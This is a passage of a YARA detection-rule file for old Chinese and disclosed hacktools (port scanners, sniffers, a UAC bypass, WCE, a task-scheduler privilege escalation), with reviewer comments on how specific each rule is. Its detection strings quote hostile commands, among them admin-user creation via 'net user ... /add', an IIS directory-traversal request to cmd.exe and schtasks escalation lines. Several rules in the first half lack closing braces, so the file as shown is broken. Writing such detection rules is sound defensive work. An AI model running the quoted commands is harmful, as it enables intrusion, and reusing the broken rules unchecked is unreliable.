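   		$s5 = "haoq@neusoft.com" fullword ascii
   		$s9 = "QQ2000b.exe" fullword ascii
   		$s10 = "\\qq2000b.exe" fullword ascii
   		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
   		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
   	condition:
   		5 of them
}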
rule _iissample_nesscan_twwwscan {
   	// Super rule over three Borland-built web scanners. $s1, $s5, $s8 and
   	// $s16 are Borland C++ runtime messages and $s12 a Borland memory-manager
   	// message, so they are shared by many Borland binaries; the IIS/patch
   	// strings ($s0, $s3, $s7, $s14) provide the specificity. All required.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		super_rule = 1
   		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
   		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
   		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
   	strings:
   		$s0 = "Connecting HTTP Port - Result: " fullword
   		$s1 = "No space for command line argument vector" fullword
   		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
   		$s5 = "No space for copy of command line" fullword
   		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
   		$s8 = "scanf : floating point formats not linked" fullword
   		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
   		$s13 = "!\"what?\"" fullword
   		$s14 = "%s Port %d Closed" fullword
   		$s16 = "printf : floating point formats not linked" fullword
   		$s17 = "xxtype.cpp" fullword
   	condition:
   		all of them
rule Tools_scan {
   	// VB-style form/module names (_AutoAttackMain, _frmIpToAddr) plus the
   	// vendor string; all three required with MZ header and a 3000KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file scan.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
   	strings:
   		$s2 = "Shanlu Studio" fullword wide
   		$s3 = "_AutoAttackMain" fullword ascii
   		$s4 = "_frmIpToAddr" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 3000KB and all of them
rule sig_238_TFTPD32 {
   	// Tftpd32 is a legitimate TFTP server utility that attackers commonly
   	// carry for file transfer; the rule fingerprints the product (help file,
   	// registry key, window class), so hits on admin workstations are expected.
   	// All nine strings required; no MZ guard.
   	meta:
   		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
   		author = "Florian Roth"
   		date = "23.11.14"
   		score = 60
   		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
   	strings:
   		$s0 = " http://arm.533.net" fullword ascii
   		$s1 = "Tftpd32.hlp" fullword ascii
   		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
   		$s3 = "TFTPD32 -- " fullword wide
   		$s4 = "%d -- %s" fullword ascii
   		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
   		$s12 = "TftpPort" fullword ascii
   		$s13 = "Ttftpd32BackGround" fullword ascii
   		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
   	condition:
   		all of them
rule CN_Hacktool_SSPort_Portscanner {
   	// SSPort SYN port scanner, matched on three UTF-16LE UI strings (all
   	// required). No hash or reference in meta and no MZ/filesize guard.
   	meta:
   		description = "Detects a chinese Portscanner named SSPort"
   		author = "Florian Roth"
   		score = 70
   		date = "12.10.2014"
   	strings:
   		$s0 = "Golden Fox" fullword wide
   		$s1 = "Syn Scan Port" fullword wide
   		$s2 = "CZ88.NET" fullword wide
   	condition:
   		all of them
rule iKAT_tools_nmap {
   	// Intentionally matches Nmap itself (a legitimate tool bundled by iKAT),
   	// so hits on admin/pentest hosts are expected. $s2 is a 4-byte nocase
   	// atom and is acceptable only because all four strings are required.
   	meta:
   		description = "Generic rule for NMAP - based on NMAP 4 standalone"
   		author = "Florian Roth"
   		date = "05.11.14"
   		score = 50
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
   		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
   	strings:
   		$s0 = "Insecure.Org" fullword wide
   		$s1 = "Copyright (c) Insecure.Com" fullword wide
   		$s2 = "nmap" fullword nocase
   		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
   	condition:
   		all of them
rule arpsniffer {
   	// WinPcap-based ARP sniffer. $s1 is a 5-byte, non-fullword atom and
   	// $s4/$s5 are WinPcap goodware strings (as the author notes), so the
   	// precision comes from $s3 together with "all of them", the MZ header
   	// and the 120KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file arpsniffer.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "7d8753f56fc48413fc68102cff34b6583cb0066c"
   	strings:
   		$s1 = "SHELL" ascii
   		$s2 = "PacketSendPacket" fullword ascii
   		$s3 = "ArpSniff" ascii
   		$s4 = "pcap_loop" fullword ascii  /* Goodware String - occured 3 times */
   		$s5 = "packet.dll" fullword ascii  /* Goodware String - occured 4 times */
   	condition:
   		uint16(0) == 0x5a4d and filesize < 120KB and all of them
rule Arp_EMP_v1_0 {
   	// Single string: the original file name as a UTF-16LE string (likely the
   	// version resource). "all of them" therefore means just $s0, and a
   	// rename/rebuild defeats the rule; the MZ/800KB guard is the only other
   	// constraint.
   	meta:
   		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
   	strings:
   		$s0 = "Arp EMP v1.0.exe" fullword wide
   	condition:
   		uint16(0) == 0x5a4d and filesize < 800KB and all of them
rule CN_Tools_hscan {
   	// hscan multi-service scanner: usage examples, report/log paths and
   	// credential-output formats (cisco enable, FTP). All eight strings are
   	// required with MZ header and a 300KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file hscan.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
   	strings:
   		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
   		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
   		$s3 = "%s -h www.target.com -all" fullword ascii
   		$s4 = ".\\report\\%s-%s.html" fullword ascii
   		$s5 = ".\\log\\Hscan.log" fullword ascii
   		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
   		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
   		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them
rule ustrrefadd {
   	// "Ultra String Reference" is an OllyDbg plugin by luocong, i.e. a
   	// reverse-engineering aid rather than an attack tool; classify hits
   	// accordingly. Note $s3 names ustrreffix.dll although the rule targets
   	// ustrrefadd.dll (as found in the sample). All required.
   	meta:
   		description = "Chinese Hacktool Set - file ustrrefadd.dll"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "b371b122460951e74094f3db3016264c9c8a0cfa"
   	strings:
   		$s0 = "E-Mail  : admin@luocong.com" fullword ascii
   		$s1 = "Homepage: http://www.luocong.com" fullword ascii
   		$s2 = ": %d  -  " fullword ascii
   		$s3 = "ustrreffix.dll" fullword ascii
   		$s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 320KB and all of them
rule FreeVersion_release {
   	// Churraskito-style token-theft privilege escalation via wmiprvse.exe
   	// (shares the wmiprvse/IIsWebInfo strings with Dos_ch). $s3 shows the
   	// default payload creates a local admin user "temp"; a hit on that string
   	// in a script or log is worth correlating with account-creation events.
   	// 3 of 6 required, MZ header and a 100KB cap.
   	meta:
   		description = "Chinese Hacktool Set - file release.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
   	strings:
   		$s1 = "-->Got WMI process Pid: %d " ascii
   		$s2 = "This exploit will execute \"net user " ascii
   		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
   		$s4 = "Running reverse shell" ascii
   		$s5 = "wmiprvse.exe" fullword ascii
   		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
rule dbexpora {
   	// NOTE(review): dbexpora.dll looks like a Borland dbExpress Oracle driver
   	// shipped alongside the toolset, and the strings are driver internals
   	// (SYS.USER_USERS query, OCI calls, ORACommand). Any Delphi application
   	// that bundles that driver may match; the 835KB cap is the only limiter.
   	meta:
   		description = "Chinese Hacktool Set - file dbexpora.dll"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "b55b007ef091b2f33f7042814614564625a8c79f"
   	strings:
   		$s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii
   		$s12 = "OCI 8 - OCIDescriptorFree" fullword ascii
   		$s13 = "ORACommand *" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 835KB and all of them
rule CN_GUI_Scanner {
   	// Output-file names (good.txt, IP.txt), an author tag (xiaoyuer) and two
   	// UTF-16LE fragments of an "ssh(...).exe" caption. All five required;
   	// no MZ/filesize guard, hash is an MD5.
   	meta:
   		description = "Detects an unknown GUI scanner tool - CN background"
   		author = "Florian Roth"
   		hash = "3c67bbb1911cdaef5e675c56145e1112"
   		score = 65
   		date = "04.10.2014"
   	strings:
   		$s1 = "good.txt" fullword ascii
   		$s2 = "IP.txt" fullword ascii
   		$s3 = "xiaoyuer" fullword ascii
   		$s0w = "ssh(" fullword wide
   		$s1w = ").exe" fullword wide
   	condition:
   		all of them
rule MooreR_Port_Scanner {
   	// yarGen strings from a VB6/packed binary: apart from $s0 they are
   	// fragments (mangled "Visual Studio\VB", "adj_fptan", "SYSTEM32" paths)
   	// rather than meaningful text, so the rule is brittle across builds.
   	// ASCII substring matches (no modifier, no fullword), all required.
   	meta:
   		description = "Auto-generated rule on file MooreR Port Scanner.exe"
   		author = "yarGen Yara Rule Generator by Florian Roth"
   		hash = "376304acdd0b0251c8b19fea20bb6f5b"
   	strings:
   		$s0 = "Description|"
   		$s3 = "soft Visual Studio\\VB9yp"
   		$s4 = "adj_fptan?4"
   		$s7 = "DOWS\\SyMem32\\/o"
   	condition:
   		all of them
rule SwitchSniffer {
   	// Matches the SwitchSniffer *installer* ("SwitchSniffer Setup" plus the
   	// vendor string), not the installed sniffer. There is no filesize cap, so
   	// the MZ check is the only bound on what gets scanned.
   	meta:
   		description = "Chinese Hacktool Set - file SwitchSniffer.exe"
   		author = "Florian Roth"
   		reference = "http://tools.zjqhr.com/"
   		date = "2015-06-13"
   		hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd"
   	strings:
   		$s0 = "NextSecurity.NET" fullword wide
   		$s2 = "SwitchSniffer Setup" fullword wide
   	condition:
   		uint16(0) == 0x5a4d and all of them
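/*
 * listip.exe from an old disclosed hacktool set: console output messages
 * of a host-lookup tool plus an "exe32pack 1.38" packer marker. All six
 * strings are required; no header or filesize guard.
 */
rule sig_238_listip {
	meta:
		description = "Disclosed hacktool set (old stuff) - file listip.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
	strings:
		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
		$s4 = "Local Host Name: %s" fullword ascii
		$s5 = "Packed by exe32pack 1.38" fullword ascii
		$s7 = "Local Computer Name: %s" fullword ascii
		$s8 = "Local IP Adress: %s" fullword ascii
	condition:
		all of them
}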
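/*
 * "Guilin veterans cookie spoofing tool.exe". The strings ("kernel32.dll^G",
 * "u56Load3", a partial INSERT statement) look like fragments of a packed
 * image rather than readable text — NOTE(review): they are tied to one
 * specific build and may not survive a repack. MZ header, size cap and all
 * four strings are required.
 */
rule Guilin_veterans_cookie_spoofing_tool {
	meta:
		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
	strings:
		$s0 = "kernel32.dll^G" fullword ascii
		$s1 = "\\.Sus\"B" fullword ascii
		$s4 = "u56Load3" fullword ascii
		$s11 = "O MYTMP(iM) VALUES (" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 1387KB and all of them
}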
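/*
 * yarGen-generated rule for PortScanner.exe, keyed on two UI strings.
 * No modifiers (plain ASCII match), no header or filesize guard; both
 * strings are required.
 */
rule PortScanner {
	meta:
		description = "Auto-generated rule on file PortScanner.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "b381b9212282c0c650cb4b0323436c63"
	strings:
		$s0 = "Scan Ports Every"
		$s3 = "Scan All Possible Ports!"
	condition:
		all of them
}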
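/*
 * UAC-bypass component: wide strings naming the migwiz directory, a
 * CRYPTBASE.dll path under it, a COM elevation moniker prefix and the
 * "BypassUac" name. The description says the source file is
 * BypassUacDll.aps although the rule is named *_EXE; there is no MZ or
 * filesize guard, and all five strings are required.
 */
rule BypassUac_EXE {
	meta:
		description = "Auto-generated rule - file BypassUacDll.aps"
		author = "yarGen Yara Rule Generator"
		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
	strings:
		$s1 = "Wole32.dll" wide
		$s3 = "System32\\migwiz" wide
		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
		$s5 = "Elevation:Administrator!new:" wide
		$s6 = "BypassUac" wide
	condition:
		all of them
}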
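/*
 * Glass2k.exe: a VB6 binary ("VB98" path, stdole2.tlb) wrapped with the
 * NeoLite compressor, plus its own file name as a wide string. The
 * toolchain strings alone are common; "Glass2k.exe" is the discriminator
 * and all five strings are required. No header or filesize guard.
 */
rule sig_238_Glass2k {
	meta:
		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
	strings:
		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
		$s4 = "Glass2k.exe" fullword wide
		$s7 = "NeoLite Executable File Compressor" fullword ascii
	condition:
		all of them
}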
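/*
 * NtGod.exe: a self-extracting wrapper ("sfxcmd") that drops NtGodMode.exe
 * into a temp directory and runs ntgod.bat. The rule matches the SFX
 * container, not the extracted payload. MZ header, size cap and all four
 * strings are required.
 */
rule Dos_NtGod {
	meta:
		description = "Chinese Hacktool Set - file NtGod.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
	strings:
		$s0 = "\\temp\\NtGodMode.exe" ascii
		$s4 = "NtGodMode.exe" fullword ascii
		$s10 = "ntgod.bat" fullword ascii
		$s19 = "sfxcmd" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 250KB and all of them
}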
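/*
 * PScan port scanner. The three strings are opaque byte sequences with no
 * readable meaning, and the meta carries no hash or date, so the rule
 * cannot be re-validated against a reference sample — hence score 50.
 * No modifiers, no header or filesize guard; all three are required.
 */
rule PScan_Portscan_1 {
	meta:
		description = "PScan - Port Scanner"
		author = "F. Roth"
		score = 50
	strings:
		$a = "00050;0F0M0X0a0v0}0"
		$b = "vwgvwgvP76"
		$c = "Pr0PhOFyP"
	condition:
		all of them
}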
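/*
 * concon.com: single-string rule on the tool's usage line. One string
 * with no header or filesize guard, so any file containing that exact
 * usage text (including documentation quoting it) will match.
 */
rule sig_238_concon {
	meta:
		description = "Disclosed hacktool set (old stuff) - file concon.com"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
	strings:
		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
	condition:
		all of them
}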
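/*
 * c.exe: an MPRESS-packed PE (".MPRESS1"/".MPRESS2" section names) that
 * imports XOLEHLP.dll and DtcGetTransactionManagerExA and embeds an HTML
 * fragment. Several strings are generic (the packer sections and the two
 * imports flagged as goodware strings), so all seven are required together
 * with the MZ header and the 100KB cap.
 */
rule Dos_c {
	meta:
		description = "Chinese Hacktool Set - file c.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "3deb6bd52fdac6d5a3e9a91c585d67820ab4df78"
	strings:
		$s0 = "!Win32 .EXE." fullword ascii
		$s1 = ".MPRESS1" fullword ascii
		$s2 = ".MPRESS2" fullword ascii
		$s3 = "XOLEHLP.dll" fullword ascii
		$s4 = "</body></html>" fullword ascii
		$s8 = "DtcGetTransactionManagerExA" fullword ascii  /* Goodware String - occured 12 times */
		$s9 = "GetUserNameA" fullword ascii  /* Goodware String - occured 305 times */
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and all of them
}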
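/*
 * PacketX.dll, an ActiveX wrapper around the WinPcap packet.dll. This is a
 * dual-use capture library rather than malware in itself, which the score
 * of 50 reflects. Two wide strings, MZ header and size cap are required.
 */
rule dll_PacketX {
	meta:
		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		score = 50
		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
	strings:
		$s9 = "[Failed to load winpcap packet.dll." wide
		$s10 = "PacketX Version" wide
	condition:
		uint16(0) == 0x5a4d and filesize < 1920KB and all of them
}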
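/*
 * EditKeyLog.exe. All four strings are truncated prompts ("Press Any Ke",
 * "Enter 1 O") that look like remnants of a packed image — NOTE(review):
 * they match one build only; confirm against the referenced hash. No
 * header or filesize guard; all four are required.
 */
rule EditKeyLog {
	meta:
		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
	strings:
		$s1 = "Press Any Ke" fullword ascii
		$s2 = "Enter 1 O" fullword ascii
		$s3 = "Bon >0 & <65535L" fullword ascii
		$s4 = "--Choose " fullword ascii
	condition:
		all of them
}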
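/*
 * 2323.exe (srvcmd.exe): a listening command shell, identified by its
 * usage text (default port 2323, "/h - Hide Window") and runtime messages.
 * All six strings are required; no header or filesize guard.
 */
rule sig_238_2323 {
	meta:
		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
	strings:
		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
		$s3 = "Failed to execute shell" fullword ascii
		$s5 = "/h   - Hide Window" fullword ascii
		$s7 = "Accepted connection from client at %s" fullword ascii
		$s9 = "Error %d: %s" fullword ascii
	condition:
		all of them
}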
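/*
 * unknown2.exe: a tool that queries online MD5 reverse-lookup services
 * ($s1-$s3). NOTE(review): the condition needs only 4 of 7 strings, and
 * $s4-$s7 ("1.5.exe", "\\Set.ini", "OpenFileDialog1", a *.txt file filter)
 * are not specific to this tool, so a PE under 300KB carrying just those
 * four satisfies the rule without any lookup URL; consider requiring at
 * least one of $s1-$s3 if false positives appear.
 */
rule unknown2 {
	meta:
		description = "Chinese Hacktool Set - file unknown2.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3"
	strings:
		$s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" fullword wide
		$s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
		$s3 = "http://www.md5.com.cn" fullword wide
		$s4 = "1.5.exe" fullword wide
		$s5 = "\\Set.ini" fullword wide
		$s6 = "OpenFileDialog1" fullword wide
		$s7 = " (*.txt)|*.txt" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 300KB and 4 of them
}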
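/*
 * ipsearcher.dll: identified by its PDB path, the _GetAddress export name,
 * its own file name and a vendor URL. MZ header, 140KB cap and all four
 * strings are required.
 */
rule ipsearcher {
	meta:
		description = "Chinese Hacktool Set - file ipsearcher.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
	strings:
		$s0 = "http://www.wzpg.com" fullword ascii
		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" fullword ascii
		$s3 = "_GetAddress" fullword ascii
		$s5 = "ipsearcher.dll" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 140KB and all of them
}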
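/*
 * scanarator.exe: single-string rule on the IIS unicode directory
 * traversal request line the scanner sends. No modifiers, header or
 * filesize guard, so IDS test data, pcaps or documentation that quote the
 * same request line will also match.
 */
rule scanarator {
	meta:
		description = "Auto-generated rule on file scanarator.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "848bd5a518e0b6c05bd29aceb8536c46"
	strings:
		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
	condition:
		all of them
}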
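/*
 * sqlcheck.exe: a class-B range scanner for SQL servers, matched on its
 * author credit, usage/example text and an IPC$ null-session argument.
 * Any 3 of the 5 strings suffice; no header or filesize guard.
 */
rule sqlcheck {
	meta:
		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
	strings:
		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
	condition:
		3 of them
}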
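/*
 * JoHor_Posts_Killer.exe: a multithreaded HTTP POST flooder. $s0, $s3 and
 * $s7 are the distinctive strings; $s8 (an MSIE 6.0 user agent), $s11/$s12
 * (forms.vbp/.vcp) and $s13 (a FlySky\E install key) look like generic
 * toolchain artefacts, so the 5-of-9 threshold is what keeps the rule
 * specific. No header or filesize guard.
 */
rule Hacktools_CN_JoHor_Posts_Killer {
	meta:
		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
	strings:
		$s0 = "Multithreading Posts_Send Killer" fullword ascii
		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
		$s6 = "The program's need files was not exist!" fullword ascii
		$s7 = "JoHor_Posts_Killer" fullword wide
		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
		$s10 = "  ( /s ) :" fullword ascii
		$s11 = "forms.vbp" fullword ascii
		$s12 = "forms.vcp" fullword ascii
		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
	condition:
		5 of them
}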
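/*
 * filespy.exe: console help and log text of a file-system activity
 * monitor ("Filmon" log records, attach/detach drive options). Because the
 * tool itself is a monitoring utility the score is only 50; 7 of the 9
 * strings are required, with no header or filesize guard.
 */
rule sig_238_filespy {
	meta:
		description = "Disclosed hacktool set (old stuff) - file filespy.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 50
		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
	strings:
		$s0 = "Hit [Enter] to begin command mode..." fullword ascii
		$s1 = "If you are in command mode," fullword ascii
		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
		$s9 = "FileSpy.exe" fullword wide
		$s12 = "ERROR starting FileSpy..." fullword ascii
		$s16 = "exe\\filespy.dbg" fullword ascii
		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
		$s19 = "Should be logging to screen..." fullword ascii
		$s20 = "Filmon:  Unknown log record type" fullword ascii
	condition:
		7 of them
}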
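/*
 * yarGen-generated rule for BluesPortScan.exe: the author credit plus one
 * opaque fragment. No modifiers (plain ASCII), no header or filesize
 * guard; both strings are required.
 */
rule BluesPortScan {
	meta:
		description = "Auto-generated rule on file BluesPortScan.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "6292f5fc737511f91af5e35643fc9eef"
	strings:
		$s0 = "This program was made by Volker Voss"
		$s1 = "JiBOo~SSB"
	condition:
		all of them
}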
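/*
 * Windows Credentials Editor (wce). Unlike the text-based rules around it,
 * this one matches three code patterns: a legacy prologue, and x86/x64
 * sequences that reference the bytes "Primary\0" (50 72 69 6d 61 72 79 00)
 * after a bounded jump. Any one pattern is enough. Code patterns survive
 * string obfuscation but not packing or recompilation — NOTE(review):
 * no hash or date is recorded, so re-validation needs an external sample.
 */
rule wce {
	meta:
		description = "wce"
		author = "Benjamin DELPY (gentilkiwi)"
		tool_author = "Hernan Ochoa (hernano)"
	strings:
		$hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 }
		$hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 }
		$hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 }
	condition:
		any of them
}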
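/*
 * ms10048-x64.exe: console output of the "Dojibiron" exploit binary.
 * The condition accepts a single string, which is lenient, but the four
 * messages are distinctive and the 40KB cap plus MZ check bound the
 * exposure.
 */
rule ms10048_x64 {
	meta:
		description = "Chinese Hacktool Set - file ms10048-x64.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
	strings:
		$s1 = "The target is most likely patched." fullword ascii
		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
		$s3 = "[ ] Creating evil window" fullword ascii
		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 40KB and 1 of them
}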
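/*
 * iKAT Task Scheduler local privilege-escalation script (VBScript). Most
 * strings contain the task name "wDw00t" and are highly specific; the
 * condition needs only 2 of 13. Being a script there is no MZ guard.
 * NOTE(review): $s8 (`a.WriteLine ("cmd.exe")`) and $s10 (a hex-decoding
 * loop) are the least specific pair and could co-occur in unrelated
 * scripts.
 */
rule iKAT_priv_esc_tasksch {
	meta:
		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
		author = "Florian Roth"
		date = "05.11.14"
		score = 75
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
	strings:
		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
	condition:
		2 of them
}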
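/*
 * DTools.exe: form class names in the T...FORM style ($s1-$s3) plus two
 * fragments. $s0 ("kernel32.dll", not fullword) is present in nearly every
 * PE and adds no discrimination on its own; the rule relies on all six
 * strings, the MZ header and the 2000KB cap.
 */
rule DTools2_02_DTools {
	meta:
		description = "Chinese Hacktool Set - file DTools.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
	strings:
		$s0 = "kernel32.dll" ascii
		$s1 = "TSETPASSWORDFORM" fullword wide
		$s2 = "TGETNTUSERNAMEFORM" fullword wide
		$s3 = "TPORTFORM" fullword wide
		$s4 = "ShellFold" fullword ascii
		$s5 = "DefaultPHotLigh" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 2000KB and all of them
}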
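/*
 * eee.exe: a VB5 binary (VB5.OLB path, MSVBVM50.DLL, vb5chs.dll) that
 * reads the Internet Explorer TypedURLs key and carries an author mail
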